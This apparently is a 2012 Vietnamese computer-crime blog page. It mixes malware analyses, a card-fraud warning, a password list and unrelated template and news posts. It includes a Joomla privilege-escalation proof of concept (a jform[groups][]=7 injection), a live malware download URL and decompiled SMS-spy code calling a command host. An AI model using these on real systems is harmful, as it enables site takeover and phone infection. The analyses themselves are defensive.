Tổng quát về Tội phạm máy tính

- Khái niệm - Đặc điểm - Tính chất

Tố giác tội phạm máy tính như thế nào?

Cách thức, thể thức và trình tự

Miễn phí bản quyền phần mềm

Tập hợp bản quyền miễn phí theo ngày

02 August 2012

[Avast] Facebook virus | Click for me, thanks!

Social sites are great for people who want monetize theirs ideas. But sometimes these ideas are far more sinister.
Over the last few last weeks,  researchers at the Avast antivirus labs in Prague have noticed new attack based on a combination of social sites, fake Flash Players and the promise of illicit videos of well-known Hollywood stars.
A number of users have complained that theirs Twitter and Facebook accounts are spreading links inviting people to see an explicit ‘home movie’ of Hollywood star Kirsten Dunst. There is of course no such movie but instead the link sends users to a fake “Facebook style” site that convinces users that they can download the movie as well as various pictures. The fake “facebook style” site is also backed up by comments from other supposed Facebook users.

However, if a visitor clicks on the video, a warning pops up claiming that they have out date Flash Player with a prompt to download an update. This is a perfect example of social engineering attack as it sets up a bait then asked for an innocuous update which requires user interaction to progress the attack. We’ve also seen farm of legitimate looking porn sites which act as proxies of other video sites and just replace the videos with the same fake Flash Player links.
In this case the update of so called Flash player should immediately ring some alarm bells as it a not digitally signed, from a unverified author and has a suspicious source link. If the user installs the fake update, the supposed video is still not served as it does not exist. Instead the attacker has effectively turned the user into an unwitting zombie visiting these sites due to the infection from the fake Flash Player.

This attack is aimed at making money from click fraud but the same idea can be used for more dangerous things like spreading key loggers to intercept critical credentials for online transactions. The advice from us is that if you are offered an update for Flash or another browser plugin – stop, manually browse to legitimate developer site and get it from there (if you need it at all). In the case of Flash, the update is freely available from the secure www.adobe.com website.
The attack starts with posts on Facebook and Twitter. The creator probably created several fake accounts and starts posting links, or as it seems, infected users can also post such links without their knowledge.
We found that there were two kinds of links. One of the links leads to site like . Running this executable file writes inside Run key. This file is a clicker, which downloads list of target urls to click.
The second way is a little bit different. The user is redirected to . We found three different possibilities -id=1 is for payload for Firefox (XPI addon), id=2 is is for Google Chrome (CRX addon) and id=3 is i.exe (MSIE BHO),
This Firefox addon (as well as the Chrome addon) contains script, which is packed by Dean Edwards packer. After running, this script changes some settings in Firefox configuration as you can see in next picture

It sets several new variables inside. All those new values start with TestAddon. There are two websites hidden under encryption in two of the variables – TestAddon.buri what is link and fallback address . User’s guid is set in TestAddon.guid. It is 32 chars long hexstring.
On those sites is script with link to sites like .
We discovered two different contents in js_f.php. The first one was used for spreading this attack via innocent users. That script updates victim’s FB and twitter status. It sends inside theirs status sentence “Kirst*en. Dunst ma**********g on hidden camera”, “It happened in United Stateshotel” And link to bit.ly/MT**4S->  and add image in status from http://i.imgur.com/[HIDDEN].jpg.
This is used for redirecting users to download Fake Flash Player. This script has some interesting functions. It could solve captcha by sending http request to . It steals the Facebook user’s session tokens and has function to automatically like FB’s pages. It can also update status with text and link to “LOL Miley Cyrus got caught having s3x http://tol.co/**”. Then it works like the second version of js_f.php.
The second discovered js_f.php contains link to http://[HIDDEN]/search/anticheat6.php?username=foreste – we found many different sites of this kind.
From those sites browser receives lists of sites which are injected inside hidden iframe which is served with every click in browser. The purpose of this is a financial gain to the creator of the malware.
For id=3 fake Flash Player is offered to download. We found many different names for this file like i.exe, FlashPlayer.exe etc. After install, this file is injecting BHO (http://en.wikipedia.org/wiki/Browser_Helper_Object). It works on same model as others IDs. The only difference is that is sending request to sites like  in r5.php is base64 coded script.
After decoding there is the following datablob:
URL:http://[HIDDEN].com/|REFERER:http://the[HIDDEN]8000.com|TIME1:60000|REPEAT:2|CLEAN_COOK:0|
JS_INSERT:http://[HIDDEN]/jstest.js?17626719|JS_ENABLED:1|IMAGES_ENABLED:0|
SHIT_ENABLED:0|FRAMES_ENABLED:1|WEIGHT:6|JS_TIMES:15
Inside jstest.js are many links to different sites that are visited by user’s browser and the attacker gains money from clicks. This file generates dll file with random name which drops inside system directory, if user is administrator, otherwise in temp directory.
To sum it up: The huge number of web plug-ins and updates that change on an almost daily basis can trick the average user into downloading malicious applications without realizing. The attackers try and make these fake updates look real and it is hard to tell the difference. Although this example is not really dangerous for the user, the same techniques could be used for much more malicious aims. What is also worth noting is the absence of detections of other AV products of this malware, with the exception of executable files. This is a known problem for both the AV companies and the testers, which still tend to test only the binaries and not the whole chain of infection (in case of this malware, there is no executable needed for Firefox/Chrome).
Simple graph of how the various modules are interconnected:



Source: https://blog.avast.com

[Tháng 8] Toiphammaytinh come back


Sau thời gian bận rộn, giờ blog tội phạm máy tính sẽ trở lại.

- Post 1 số chủ đề nghiên cứu về Tội phạm máy tính
- Trở lại với mục Bản quyền miễn phí (dạng tổng hợp theo ngày)
- Gợi ý 1 số hướng giải quyết các vụ việc do các bạn gửi mail về
- Update các thông tin thay đổi

28 July 2012

[Security] Cảnh báo lừa đảo thẻ tín dụng tại Việt Nam

Cảnh báo lừa đảo thẻ tín dụng

Ngày 27-7 Ngân hàng Nhà nước (NHNN) đã cảnh báo thủ đoạn lừa đảo mới của tội phạm thẻ tín dụng. Cụ thể, một số đối tượng người nước ngoài nhập cảnh vào VN mang theo các thiết bị làm giả thẻ tín dụng, đồng thời móc nối với một số đơn vị chấp nhận thanh toán thẻ trong nước thanh toán khống hàng hóa để rút tiền mặt nhằm chiếm đoạt tiền trong tài khoản của các chủ thẻ tín dụng người nước ngoài.

Thông thường hoạt động của các đối tượng này diễn ra khoảng từ 12g-17g và từ 20g-23g hằng ngày, mỗi giao dịch cách nhau 20-30 giây.

NHNN nhận định đây là thủ đoạn mới của tội phạm sử dụng công nghệ cao, gây thiệt hại cho các chủ thẻ tín dụng, đồng thời ảnh hưởng đến hoạt động thanh toán điện tử cũng như thương hiệu của nhiều ngân hàng trong nước. NHNN yêu cầu các ngân hàng rà soát những giao dịch thanh toán đáng ngờ qua POS, trong đó cần chú ý đến những đơn vị chấp nhận thanh toán thẻ có số lượng giao dịch liên tục với nhiều thẻ khác nhau vào thời gian bất thường trong ngày. Nếu phát hiện phải báo cáo NHNN và Cục Cảnh sát phòng chống tội phạm công nghệ cao để có biện pháp ngăn chặn kịp thời.

26 June 2012

[Bug] Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability


Firebug: <input name="jform[groups][]" value="7" />
Tamper Data: jform[groups][]=7

Chi tiết


index.php?option=com_users&view=registration (2.x)

index.php?option=com_user&view=register (Joomla! 1.x)

1. go to mydomain + index.php?option=com_users&view=registration

2. The first time I enter de pass incorrect.

3. The second time y insert with firebug after " .

24 June 2012

[Diệt] Malware STL | d517e448e15f3ea3b0405b7679eccfd7 | AcrobatUpdater.exe


Dành cho bạn nào thắc mắc về việc làm sao xoá con malware này.

Hãy tìm trong C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau:

1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra.

2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe.

3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm.

4. Xoá nó ngay.

5. Vào registry và xoá các key sau:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Volatile Environment]
CURRENT = "2011-07-20 16:28:52"
DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15


Chi tiết
http://www.hvaonline.net/hvaonline/posts/list/0/39641.hva

17 June 2012

13 June 2012

[TOP] 25 mã PIN và mật khẩu PASSWORD tệ nhất


Password | Mật khẩu

  1. password
  2. 123456
  3. 12345678
  4. 1234
  5. qwerty
  6. 12345
  7. dragon
  8. pussy
  9. baseball
  10. football
  11. letmein
  12. monkey
  13. 696969
  14. abc123
  15. mustang
  16. michael
  17. shadow
  18. master
  19. jennifer
  20. 111111
  21. 2000
  22. jordan
  23. superman
  24. harley
  25. 1234567

PIN

  1. 1234
  2. 0000
  3. 2580
  4. 1111
  5. 5555
  6. 5683
  7. 0852
  8. 2222
  9. 1212
  10. 1998
  11. 6969
  12. 1379
  13. 1997
  14. 2468
  15. 9999
  16. 7777
  17. 1996
  18. 2011
  19. 3333
  20. 1999
  21. 8888
  22. 1995
  23. 2525
  24. 1590
  25. 1235

07 June 2012

[Phân tích] http://210.211.100.170/g/l9.jar TQN

1 post của anh TQN trên facebook






Từ khóa

"Sexy NgocTrinh>>Chi danh cho 18+. Tai MienPhi: http://210.211.100.170/g/l9.jar"

Phân tích

Trưa này, wget nó về thử xem sao. Dùng 7z unjar nó, DJ Java Decompiler để decompiler. Hì hì, hình như một dạng SMS spy. Vì code đt tui không rành lắm, post lên cho bà con chỉ giáo:
private final String MIDLET_CLASS_NAME = "GameMidlet";
private static final String SMS_CONNECTION_URL = "sms://:5678";
private static final String ALLOWED_SENDER_FILTER = "*";
....
public void run()
{
if(sendSms(h3.SMS_NUMBER, h3.SMS_CODE))
try
{
rc = RecordStore.openRecordStore(h3.RC_CODE, true);
sRecord(rc, 1);
rc.closeRecordStore();
}
......
socket://dzanchoi.vn:9002
........
Em đề nghị cơ quan có chức năn tìm ngay chủ nhân của cái IP 210.211.100.170 và dzanchoi.vn, mời nó đi ăn cơm miễn phí, mặc áo Juventus cho vui.
Bổ sung


Làm được gì ?

:))

01 June 2012

[Lượm] Tài năng tuổi teen trong giới công nghệ


Những tài năng tuổi teen trong giới công nghệ
Trong số đó có những cậu bé chỉ mới đang học tiểu học nhưng đã có thể viết hàng nghìn dòng mã để lập trình ứng dụng trên các nền tảng nổi tiếng như iOS và Android.
Mới học lớp 8, Robert Nay ở Utah (Mỹ) đã viết hơn 4.000 dòng mã cho game Bubble Ball và thu hút 2 triệu lượt tải chỉ sau 2 tuần đầu năm 2011. Cậu còn sở hữu công ty riêng mang tên Nay Games.
Sahil Lavingia, người Mỹ gốc Ấn, đang được coi là chàng trai tuổi teen đáng chú ý nhất thung lũng Silicon. Bằng việc thiết kế website, từ năm 15 tuổi, Lavingia đã độc lập về tài chính và tài khoản ngân hàng luôn có hơn 100.000 USD. Năm 17 tuổi, cậu là một trong những thành viên đầu tiên của mạng xã hội ảnh Pinterest. Còn hiện nay, hotboy 19 tuổi này đã thu hút được vài triệu USD cho dự án bán hàng qua mạng Gumroad của mình.
Từ năm 2009 khi mới 9 tuổi và học lớp 4, cậu bé Lim Ding Wen người Singapore đã hoàn thành 20 dự án lập trình, trong đó có ứng dụng tập vẽ Doodle Kids hoạt động trên iPhone. Wen làm quen với máy tính từ năm lên 2, mê đọc sách về phần mềm và thành thạo nhiều ngôn ngữ lập trình.
Trong khi bạn bè còn đang mải mê với các trò chơi, bé Connor Zamary (Mỹ) mới 8 tuổi đã là một chuyên gia lập trình. Năm 2011, trò Toaster Pop của cậu đã rất được yêu thích dù là game thu phí 1 USD. Zamary tự dùng tiền tiết kiệm để đầu tư, tạo các tệp PowerPoint và thuyết trình trước các nhà phát triển West Coast. Cậu còn dự định lập công ty riêng và dùng số tiền kiếm được để học đại học và ủng hộ cho trẻ em nghèo châu Phi.
Cuối năm 2011, khi mới học lớp 6, Thomas Suarez đã có cơ hội lên hẳn sân khấu sự kiện TEDx ở Mỹ để chia sẻ kinh nghiệm viết phần mềm cho smartphone. "Rất nhiều trẻ em thích chơi game, nhưng ngày nay họ còn tự tạo ra game nữa", Suarez khẳng định.
Còn cô học sinh lớp 4 có biệt danh CyFi tại California (Mỹ) lại được giới hacker kính nể khi công bố lỗ hổng chưa từng được phát hiện trong nhiều trò chơi chạy trên 2 nền tảng di động phổ biến nhất hiện nay là iOS và Android. Hacker nhí này đã mô tả khám phá của mình trong hội thảo DefCon 19 hồi tháng 8/2011.

[Miễn phí] TOP 30 template blogspot 2012

1. BoyBurnsBlog

A clean minimalist template which is customizable through the Blogger Template Designer. Uses jQuery Masonary for a non-linear appearance. I particularly like how images are resized to fit the entire available space of the columns. This is an original design by Blogger Xpertise (and I hope there's more to follow!)

Demo | Download

2. Circulos

Designed by Compartdisimo, this is a stunning template in which images are automatically transformed to be circular in appearance. Ideal as a portfolio template!

Demo | Download

3. O-Beat


A stunning design by Loefa-Cebook which includes an integrated slider on the home page.

Demo | Download

4. X6 Yellow



Also available in dark and light variations, this is a visually stunning template designed by Urang Kurai with a unique display of posts on the home page.

Demo | Download

5. X5 Shadow 



Another stunning Blogger template by Urang Kurai, this dark design has plenty of space for gadgets.

Demo | Download

6. Proposal Theme



Uses a photo image as a background to generate this striking effect. Perfect for business websites, though a lot of template tweaking is required. Designed by 54Blogger.

Demo | Download

7. The Picfotoplate



Another fresh template designed by 54Blogger, which is ideal to showcase photography, art and design work.


Demo | Download


8. Lifetime




Converted from the Wordpress template by Top WP Themes and converted for Blogger by Advinas Bhardwaj, this dark Blogger design feature striking set-up for posts and plenty of room for gadgets.

Demo | Download

9. Boston



A clean stylish design based on the Wordpress theme by Fab Themes and converted by Best Theme.

Demo | Download

10. Shutter Shot



A stunning design with a full-page slideshow background which is ideal for photographers and artists! Based on the original template by Fab Themes and converted for Blogger by Best Themes.

Demo | Download

11. Deposit Photos



An excellent portfolio template designed by Best Themes. From what I can tell, this is an original theme (not converted) but please feel free to let me know if further accreditation is required!

Demo | Download

12. Manifest



A minimalist, single column theme for those want their content to take center stage! Originally designed by Jim Barraud and converted for Blogger by Litethemes.

Demo | Download

13. Versatile


As the title suggests, this is an incredibly versatile theme (showcased in the demo as a bibliophile blog), with plenty of gadget spaces available and a wonderful use of the "popular posts" widget near the footer.

Demo | Download

14. Capture



I adore this beautifully simple theme which would be perfect as a portfolio style website (though I'm personally very tempted to use it as the basis for my personal blog!). An original design by Dzignine.

Demo | Download

15. Blogger Store



This template is amazing! Featuring SimpleCart integration and a custom layout for posts. It's even possible to customize elements using the Blogger Template Designer! An original design by JavaTemplates.

Demo | Download

16. Brown Flyer



This resume style template was designed by Resume Online Template and provides a stylish way to show off your employability.

Demo | Download

17. Perpetum Magazine


The featured posts section of this template reminds me of selecting a book from a shelf! Originally designed by SimpleWPThemes and "bloggerized" by Custom Blogger Templates.

Demo | Download

18. Template Clean 2011


A clean minimalist theme by Templates Novo Blogger

Demo | Download

19. Ebusinesscard



This single page business card design is unusual but highly useful! An original design by Bloggermint.


Demo | Download


20. Shopping Cart Blogger Template



Making use of SimpleCart integration, here is another Blogger template which may be used for ecommerce. Designed by Bloggermint, and including a handy post template, this design is well worth checking out.


Demo | Download

21.  Coming Soon



Not ready to launch your site yet? Use this simple theme as a "coming soon" page where visitors can see your site's progress and sign up for email notifications of updates. Original HTML theme by Media Loot, converted for Blogger by Best Theme.


Demo | Download

22. Legit


This simple theme includes a beautiful animated header, and alternative location for your site logo in the sidebar. An original design by Dzignine.

Demo | Download 

23. BlueFolio Legacy


A striking blue-themed showcase template by Dzignine

Demo | Download 

24. Blogazine Book


Inspired by the design of Facebook, this free Blogger template utilizes a unique home-page style with links to the main "blog" and "about" sections. Designed by Urang Kurai.

Demo | Download 

25. Blogazine


At first glance you'd be forgiven for thinking this template is simple. But click on a post link from the home page and you'll see that this typographic based design is special! On item pages, the background colour can be configured separately for each post!

Demo | Download 

26. Quo


Minimal and monochrome, this template is designed by Ciudad and is perfect for typographic content.

Demo | Download

27. Nocturnas


A dark compelling theme by Ciudad.

Demo | Download  

28. Clean Vintage


Displayed with a gorgeous colour theme, this is an original vintage style design by Ayuda Bloggers.

Demo | Download


29. Photo Gallery Woody


This template by AllBlogTools would make an excellent choice for those wishing to show off their work.


Demo | Download

30. Xanadu


A high-contrast template featuring a unique layout. Originally designed by Fab Themes and converted for Blogger by Best Themes.

Demo | Download

31. Compartdisimos


A playful template by Compartdisimo which includes custom presentation of popular items and post layouts.

Demo | Download


32. CleanRed


A simple portfolio template converted from the CSS design by CSS Heaven.

Demo | Download 

TOP 30 Template Blogspot